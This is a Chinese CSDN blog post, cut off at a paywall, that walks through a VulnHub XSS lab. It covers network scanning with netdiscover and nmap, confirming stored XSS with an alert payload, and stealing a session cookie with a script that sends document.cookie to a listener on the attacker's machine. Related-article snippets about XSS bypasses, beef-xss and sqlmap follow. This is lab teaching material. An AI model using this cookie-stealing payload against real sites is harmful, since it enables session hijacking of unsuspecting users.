XSS漏洞(xss_and_mysql_file靶场实战)——渗透day10

已于 2022-09-09 14:03:23 修改
阅读量1.9k 收藏 7
点赞数 3
文章标签: xss 数据库 java web安全
于 2022-09-07 16:31:44 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62716256/article/details/126724666
版权

1、使用VMware开启 xss_and_mysql_file 环境并查看靶机的IP,开启kali

2、kali中使用  netdiscover -r 192.168.174.0/24  指令扫描开放的IP,搜索到了靶机IP为192.168.174.137

3、kali中使用  nmap -sC -sV -p- 192.168.174.137 -n -vv --min-rate=2000  指令扫描192.168.174.137的端口,发现靶机开放了22端口有OpenSSH 5.5p1、80端口有Apache

4、访问一下 192.168.174.137,查看一下网页,发现可以写内容,尝试随意写点数据

        

5、查看网页源码发现了我们写入的内容,这里可能存在XSS漏洞 

6、尝试写入    <script>alert('1+1')</script>  指令,发现出现弹窗,这说明这里存在XSS漏洞

7、重启 xss_and_mysql_file虚拟机把数据还原到原始状态,重新进入192.168.174.137网页

8、在kali中开启对80端口的监听,输入   python3 -m http.server 80   指令

9、输入进行XSS注入用来盗取取cookie 输入

 <script>new Image().src="http://192.168.174.129/test.php?o="+document.cookie;</script>  进行注入,查看监听的80端口获得了cookei,复制 output=PHPSESSID=ea7c9v0cajgip3e5usrcjfai57

最低0.47元/天 解锁文章
菜鸟也疯狂!!
关注
  • 3
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
漏洞扫描(kali beef-xss、DNSlog、CSRF、SSRF)
m0_61506558的博客
08-04 1500
并且其中的内容会被服务器端执行,插入的代码可能导致任意文件读取、系统命令执行、内网端口 探测、攻击内网网站等危害。,'.yourid.ceye.io/jinyiuxin'))),1,0) 黑体处拼接SQL语句。gopher协议:是一种信息查找系统,只支持文本,不支持图像,已被HTTP替代。第三方网站利用被攻击网站生效的cookie,直接对服务器接口发起请求。抓取正常通信请求的数据包,再请求一次。.........
vulnhub:xss_and_mysql_file
weixin_45498459的博客
06-21 982
xssandmysq 使用sqlmap进行dump数据库 使用冰歇shell 或者换成菜刀的一句话木马 网上有 使用冰蝎进行链接 这个百度贼全Kali—Dirbuster工具用法 - 简书 (jianshu.com)
XSS漏洞讲解与多篇实战讲解
浪子燕青的博客
02-25 3367
跨站脚本攻击 XSS攻击基础 概述 个人对XSS攻击的原理认知: 原理:对可以控制传参的位置,比如url链接中,输入框中,首先闭合输出参数位置前后网页标签,在闭合的中间加上JavaScript代码或者其他的html标签,使得网页能够执行你添加的参数功能。 危害:凡是js能做的,大部分xss漏洞都能利用,常见的比如获取当前cookie,获取浏览器保存的账号密码 、获取屏幕截图,获取页面的数据,改变页面的逻辑,向服务器发送数据请求等。 情景:在挖洞的情景下,只要保证能弹个窗,或者执行js代码即可。但是
XSS实战漏洞挖掘
最新发布
hmysn的博客
05-11 803
接下来一年时间将会主要研究渗透测试方向的众多问题,文章中的内容也会在后面定期更新。本文主要记录了一些XSS漏洞挖掘中的实用心得和学习笔记。
kali xss漏洞扫描工具使用教程
weixin_49071539的博客
11-19 2749
xss漏洞扫描教程 git clone https://github.com/hahwul/XSpear.git cd XSpear/ ls gem sudo gem install XSpear-1.4.1.gem (往后版本可能会更新,根据文件夹里的版本进行下载) XSpear -u “http://test.php.vulnweb.com/listproducts.php?cat=123” -v 1 注:https://bit.ly/35NOnDS 这是一个极易受攻击的安卓实验室!!! ...
xss绕过方法有哪些?XSS攻击绕过过滤方法技巧分享(xss绕过宝塔)
白帽子佳奇的博客
12-12 3782
XSS(跨站脚本攻击)绕过方法是一系列技巧,用来绕过目标网站的安全措施和过滤器,执行恶意的脚本。
Kali网络渗透测试实验三——XSS和SQL注入
qq_45746876的博客
11-24 3284
XSS和SQL注入前言实验目的系统环境:Kali Linux 2、Windows ServerXSS部分:利用Beef劫持被攻击者客户端浏览器实验环境搭建1.利用AWVS扫描留言簿网站,发现其存在XSS漏洞2.Kali使用beef生成恶意代码3.访问http://留言簿网站,将恶意代码写入网站留言板4.管理员登录login.htm,账号密码均为admin,审核用户留言5.回答问题SQL注入部分:DVWA+SQLmap+Mysql注入实战sqlmap语法参考1.注入点发现2.枚举当前使用的数据库名称和用户名3
【网络安全 --- XSS漏洞利用实战】你知道如何利用XSS漏洞进行cookie获取,钓鱼以及键盘监听吗?--- XSS实战
m0_67844671的博客
10-05 3406
你知道xss漏洞如何利用吗?本篇文章详细介绍了利用XSS漏洞如何实现cookie盗取,钓鱼获取用户名密码以及监听键盘记录等,让你对xss漏洞有进一步认识。
网络安全渗透XSS【概要总结】
我这不是依托答辩随你怎么说
03-07 349
钓鱼欺骗、网站挂马、身份盗用、盗取网站用户信息、垃圾信息发送、劫持用户Web行为、XSS蠕虫。
信安lab3:XSS漏洞和SQL注入
weixin_39974600的博客
02-11 1313
XSS漏洞和SQL注入相关的实验
XSS_Rays.zip_XSS Rays 下载_tool_xss扫描_xss扫描器_漏洞扫描
09-22
基于JS的XSS扫描器——XSS Rays. 最近The Spanner发布了一个名为XSS Rays的 XSS漏洞扫描器。这tool有点意思,是使用JS写的,JS遍历目标的link、form,然后构造测试用例去测试,可以发现DOM的XSS(当然是在测试用例打...
JS-XSS-.rar_XSS_js XSS
09-20
对js解决跨域问题、传统的同源策略、的问题进行了详细的阐述、值得收藏!
XSS.rar_XSS_cross scripting_cross site java_cross site scripting
09-14
Cross Site Scripting
XSS.zip_XSS_c xss
09-24
介绍了跨站脚本的基本知识,会对你产生很好的帮助作用。
在虚拟机上搭建xss平台
这是笔者初学时所做的笔记,有错误的地方太多了,有些结论也只是笔者的一家之言。请自行判断
08-05 3309
目录1.将源码放进虚拟机2.更改配置文件3.创建数据库4.导入数据库5.修改域名6.添加.htaccess伪静态文件7.使用8.提权9.测试10.资源 前言:在实施xss攻击的时候,需要有一个平台用来收集攻击获得猎物(cookie,用户名密码等),xss.me就是这样的一个平台。文末有链接 1.将源码放进虚拟机 2.更改配置文件 进入应用根目录(不是网页根目录),找到config.php文件。 主要改3个地方: 数据库信息:账号密码要对,数据库名可以随便写一个 注册信息:将invite改为normal(
XSS、CSRF、SSRF、暴力破解
qq_51780583的博客
08-10 746
XSS、CSRF、SSRF、暴力破解
文件上传攻击骚操作
qq_50854662的博客
02-21 6415
文件上传攻击骚操作
XSS入门 XSS Challenges靶场搭建/前五关/基础教程
ChenD的学习笔记
10-11 1107
XSSChallenges 前五关,XSS注入点判断
XSS跨站脚本 xss_script_tag
07-09
X(跨站脚本攻击)是一种常见网络安全漏洞,攻击者通过注恶意脚本代码来攻击网站的用户。其中,xss_script_tag指的是一种XSS攻击的方式,即通过在HTML标签中嵌入恶意脚本。 例如,攻击者可能会在一个script标签中插入恶意代码,以获取用户的敏感信息或执行其他恶意操作。这种攻击方式通常利用网站对用户输入的不正确处理,从而使攻击者能够注入和执行自己的脚本代码。 为了防止XSS攻击,开发者应该采取以下措施: 1. 输入验证:对用户输入进行验证和过滤,确保只接受预期的输入,过滤掉任何可疑的或恶意的代码。 2. 输出编码:在将用户输入显示在网页上之前,对其进行适当的编码,以防止浏览器解析恶意脚本。 3. 使用CSP(内容安全策略):CSP是一种HTTP头部,它允许网站管理员控制网页中允许加载的资源来源。通过配置CSP,可以限制恶意脚本的执行。 4. 尽量避免使用动态生成HTML:如果必须使用动态生成HTML,请确保对于引入用户输入的部分,进行适当的编码和过滤。 通过采取这些措施,开发者可以降低网站受到XSS攻击的风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值